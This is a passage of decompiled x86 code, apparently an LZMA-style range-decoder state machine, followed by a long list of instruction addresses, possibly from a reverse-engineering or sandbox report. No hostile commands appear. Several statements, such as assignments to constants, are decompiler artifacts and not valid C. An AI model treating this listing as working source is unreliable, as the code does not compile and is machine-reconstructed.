                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t484 = __ebp - 0x70;
                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t484;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L148:
                                                                      												_t487 = __ebp - 0x48;
                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                      												__eflags =  *_t487;
                                                                      												L149:
                                                                      												__eflags =  *(__ebp - 0x48);
                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                      													__ecx =  *(__ebp - 0x40);
                                                                      													__ebx =  *(__ebp - 0x50);
                                                                      													0 = 1;
                                                                      													__eax = 1 << __cl;
                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                      													__eax =  *(__ebp - 0x7c);
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													while(1) {
                                                                      														 *(_t621 - 0x88) = _t542;
                                                                      														goto L1;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x50);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__esi = __edx + __eax;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__ax =  *__esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													__cx = __ax >> 5;
                                                                      													__eax = __eax - __ecx;
                                                                      													__edx = __edx + 1;
                                                                      													__eflags = __edx;
                                                                      													 *__esi = __ax;
                                                                      													 *(__ebp - 0x50) = __edx;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L148;
                                                                      												} else {
                                                                      													goto L146;
                                                                      												}
                                                                      											case 0x19:
                                                                      												__eflags = __ebx - 4;
                                                                      												if(__ebx < 4) {
                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                      													L119:
                                                                      													_t393 = __ebp - 0x2c;
                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                      													__eflags =  *_t393;
                                                                      													L120:
                                                                      													__eax =  *(__ebp - 0x2c);
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                      														goto L170;
                                                                      													}
                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                      														goto L171;
                                                                      													}
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                      													__eax =  *(__ebp - 0x30);
                                                                      													_t400 = __ebp - 0x60;
                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                      													__eflags =  *_t400;
                                                                      													goto L123;
                                                                      												}
                                                                      												__ecx = __ebx;
                                                                      												__eax = __ebx;
                                                                      												__ecx = __ebx >> 1;
                                                                      												__eax = __ebx & 0x00000001;
                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                      												__al = __al | 0x00000002;
                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                      												__eflags = __ebx - 0xe;
                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                      												if(__ebx >= 0xe) {
                                                                      													__ebx = 0;
                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                      													L102:
                                                                      													__eflags =  *(__ebp - 0x48);
                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                      														__eax = __eax + __ebx;
                                                                      														 *(__ebp - 0x40) = 4;
                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                      														__eax =  *(__ebp - 4);
                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                      														__eflags = __eax;
                                                                      														L108:
                                                                      														__ebx = 0;
                                                                      														 *(__ebp - 0x58) = __eax;
                                                                      														 *(__ebp - 0x50) = 1;
                                                                      														 *(__ebp - 0x44) = 0;
                                                                      														 *(__ebp - 0x48) = 0;
                                                                      														L112:
                                                                      														__eax =  *(__ebp - 0x40);
                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                      															_t391 = __ebp - 0x2c;
                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                      															__eflags =  *_t391;
                                                                      															goto L119;
                                                                      														}
                                                                      														__eax =  *(__ebp - 0x50);
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      														__eax =  *(__ebp - 0x58);
                                                                      														__esi = __edi + __eax;
                                                                      														 *(__ebp - 0x54) = __esi;
                                                                      														__ax =  *__esi;
                                                                      														__ecx = __ax & 0x0000ffff;
                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                      															__ecx = 0;
                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                      															__ecx = 1;
                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                      															__ebx = 1;
                                                                      															__ecx =  *(__ebp - 0x48);
                                                                      															__ebx = 1 << __cl;
                                                                      															__ecx = 1 << __cl;
                                                                      															__ebx =  *(__ebp - 0x44);
                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                      															__cx = __ax;
                                                                      															__cx = __ax >> 5;
                                                                      															__eax = __eax - __ecx;
                                                                      															__edi = __edi + 1;
                                                                      															__eflags = __edi;
                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                      															 *__esi = __ax;
                                                                      															 *(__ebp - 0x50) = __edi;
                                                                      														} else {
                                                                      															 *(__ebp - 0x10) = __edx;
                                                                      															0x800 = 0x800 - __ecx;
                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      															 *__esi = __dx;
                                                                      														}
                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      															L111:
                                                                      															_t368 = __ebp - 0x48;
                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                      															__eflags =  *_t368;
                                                                      															goto L112;
                                                                      														} else {
                                                                      															goto L109;
                                                                      														}
                                                                      													}
                                                                      													__ecx =  *(__ebp - 0xc);
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                      														__ecx =  *(__ebp - 0x10);
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      														__ebx = __ebx | 0x00000001;
                                                                      														__eflags = __ebx;
                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														L101:
                                                                      														_t338 = __ebp - 0x48;
                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                      														__eflags =  *_t338;
                                                                      														goto L102;
                                                                      													} else {
                                                                      														goto L99;
                                                                      													}
                                                                      												}
                                                                      												__edx =  *(__ebp - 4);
                                                                      												__eax = __eax - __ebx;
                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                      												goto L108;
                                                                      											case 0x1a:
                                                                      												L56:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x68);
                                                                      												__al =  *(__ebp - 0x5c);
                                                                      												__edx =  *(__ebp - 8);
                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                      												__ecx =  *(__ebp - 0x14);
                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      												__eax = __ecx + 1;
                                                                      												__edx = 0;
                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t192;
                                                                      												goto L79;
                                                                      											case 0x1b:
                                                                      												L75:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                      													goto L170;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__edx =  *(__ebp - 8);
                                                                      												__cl =  *(__eax + __edx);
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                      												 *(__eax + __edx) = __cl;
                                                                      												__eax = __eax + 1;
                                                                      												__edx = 0;
                                                                      												_t274 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t274;
                                                                      												__eax =  *(__ebp - 0x68);
                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												_t283 = __ebp - 0x64;
                                                                      												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                      												__eflags =  *_t283;
                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                      												L79:
                                                                      												 *(__ebp - 0x14) = __edx;
                                                                      												goto L80;
                                                                      											case 0x1c:
                                                                      												while(1) {
                                                                      													L123:
                                                                      													__eflags =  *(__ebp - 0x64);
                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                      														break;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                      														__eflags = __eax;
                                                                      													}
                                                                      													__edx =  *(__ebp - 8);
                                                                      													__cl =  *(__eax + __edx);
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                      													 *(__eax + __edx) = __cl;
                                                                      													__eax = __eax + 1;
                                                                      													__edx = 0;
                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                      													__edx = _t414;
                                                                      													__eax =  *(__ebp - 0x68);
                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                      													__eflags =  *(__ebp - 0x30);
                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                      													 *(__ebp - 0x14) = _t414;
                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                      														continue;
                                                                      													} else {
                                                                      														L80:
                                                                      														 *(__ebp - 0x88) = 2;
                                                                      														goto L1;
                                                                      													}
                                                                      												}
                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                      												goto L170;
                                                                      										}
                                                                      									}
                                                                      									L171:
                                                                      									_t544 = _t543 | 0xffffffff;
                                                                      									goto L172;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L1;
                                                                      				}
                                                                      			}














                                                                      0x00000000
                                                                      0x00406d59
                                                                      0x00406d59
                                                                      0x00406d5d
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d8b
                                                                      0x00406d91
                                                                      0x00406da3
                                                                      0x00406da9
                                                                      0x00406dae
                                                                      0x00000000
                                                                      0x00406d5f
                                                                      0x00406d65
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407177
                                                                      0x0040717b
                                                                      0x0040732a
                                                                      0x00407340
                                                                      0x00407348
                                                                      0x0040734f
                                                                      0x00407351
                                                                      0x00407358
                                                                      0x0040735c
                                                                      0x0040735c
                                                                      0x00407187
                                                                      0x0040718e
                                                                      0x00407196
                                                                      0x00407199
                                                                      0x0040719c
                                                                      0x0040719c
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x00406947
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00000000
                                                                      0x00406958
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406961
                                                                      0x00406964
                                                                      0x00406967
                                                                      0x0040696b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406971
                                                                      0x00406974
                                                                      0x00406976
                                                                      0x00406977
                                                                      0x0040697a
                                                                      0x0040697c
                                                                      0x0040697d
                                                                      0x0040697f
                                                                      0x00406982
                                                                      0x00406987
                                                                      0x0040698c
                                                                      0x00406995
                                                                      0x004069a8
                                                                      0x004069ab
                                                                      0x004069b7
                                                                      0x004069df
                                                                      0x004069e1
                                                                      0x004069ef
                                                                      0x004069ef
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069e6
                                                                      0x004069e7
                                                                      0x004069e7
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069bd
                                                                      0x004069c2
                                                                      0x004069c2
                                                                      0x004069cb
                                                                      0x004069d3
                                                                      0x004069d6
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069f9
                                                                      0x004069f9
                                                                      0x004069fd
                                                                      0x004072a9
                                                                      0x00000000
                                                                      0x004072a9
                                                                      0x00406a06
                                                                      0x00406a16
                                                                      0x00406a19
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1f
                                                                      0x00406a23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a25
                                                                      0x00406a2b
                                                                      0x00406a55
                                                                      0x00406a5b
                                                                      0x00406a62
                                                                      0x00000000
                                                                      0x00406a62
                                                                      0x00406a31
                                                                      0x00406a34
                                                                      0x00406a39
                                                                      0x00406a39
                                                                      0x00406a44
                                                                      0x00406a4c
                                                                      0x00406a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a9a
                                                                      0x00406a9d
                                                                      0x00406aaa
                                                                      0x00406ab2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a69
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x004072b8
                                                                      0x00000000
                                                                      0x004072b8
                                                                      0x00406a79
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8a
                                                                      0x00406a8d
                                                                      0x00406a92
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406aba
                                                                      0x00406abc
                                                                      0x00406abf
                                                                      0x00406b30
                                                                      0x00406b33
                                                                      0x00406b36
                                                                      0x00406b3d
                                                                      0x00406b47
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00406ac1
                                                                      0x00406ac5
                                                                      0x00406ac8
                                                                      0x00406aca
                                                                      0x00406acd
                                                                      0x00406ad0
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad7
                                                                      0x00406adc
                                                                      0x00406adf
                                                                      0x00406ae2
                                                                      0x00406ae6
                                                                      0x00406aed
                                                                      0x00406af0
                                                                      0x00406af7
                                                                      0x00406afb
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406b07
                                                                      0x00406b0a
                                                                      0x00406b28
                                                                      0x00406b2a
                                                                      0x00000000
                                                                      0x00406b0c
                                                                      0x00406b0c
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1d
                                                                      0x00406b1f
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406dc3
                                                                      0x00406dc7
                                                                      0x00406dea
                                                                      0x00406ded
                                                                      0x00406df0
                                                                      0x00406dfa
                                                                      0x00406dc9
                                                                      0x00406dc9
                                                                      0x00406dcc
                                                                      0x00406dcf
                                                                      0x00406dd2
                                                                      0x00406ddf
                                                                      0x00406de2
                                                                      0x00406de2
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00406e06
                                                                      0x00406e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e10
                                                                      0x00406e14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e1a
                                                                      0x00406e1c
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00406e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e77
                                                                      0x00406e7b
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e88
                                                                      0x00406e92
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00406e7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00406eb8
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00406ec1
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ecb
                                                                      0x00406ed0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406db1
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f4
                                                                      0x00407116
                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x00000000
                                                                      0x004071e4
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406eef
                                                                      0x00406ef2
                                                                      0x00406ef5
                                                                      0x00406ef7
                                                                      0x00406ef9
                                                                      0x00406ef9
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f04
                                                                      0x00406f07
                                                                      0x00406f15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071fa
                                                                      0x004071fa
                                                                      0x004071fe
                                                                      0x00407336
                                                                      0x00000000
                                                                      0x00407336
                                                                      0x00407204
                                                                      0x00407207
                                                                      0x0040720a
                                                                      0x0040720e
                                                                      0x00407211
                                                                      0x00407217
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x0040721c
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x00407222
                                                                      0x00407222
                                                                      0x00407226
                                                                      0x00407286
                                                                      0x00407289
                                                                      0x0040728e
                                                                      0x0040728f
                                                                      0x00407291
                                                                      0x00407293
                                                                      0x00407296
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x004071a8
                                                                      0x004071a2
                                                                      0x00407228
                                                                      0x0040722e
                                                                      0x00407231
                                                                      0x00407234
                                                                      0x00407237
                                                                      0x0040723a
                                                                      0x0040723d
                                                                      0x00407240
                                                                      0x00407243
                                                                      0x00407246
                                                                      0x00407249
                                                                      0x00407262
                                                                      0x00407265
                                                                      0x00407268
                                                                      0x0040726b
                                                                      0x0040726f
                                                                      0x00407271
                                                                      0x00407271
                                                                      0x00407272
                                                                      0x00407275
                                                                      0x0040724b
                                                                      0x0040724b
                                                                      0x00407253
                                                                      0x00407258
                                                                      0x0040725a
                                                                      0x0040725d
                                                                      0x0040725d
                                                                      0x00407278
                                                                      0x0040727f
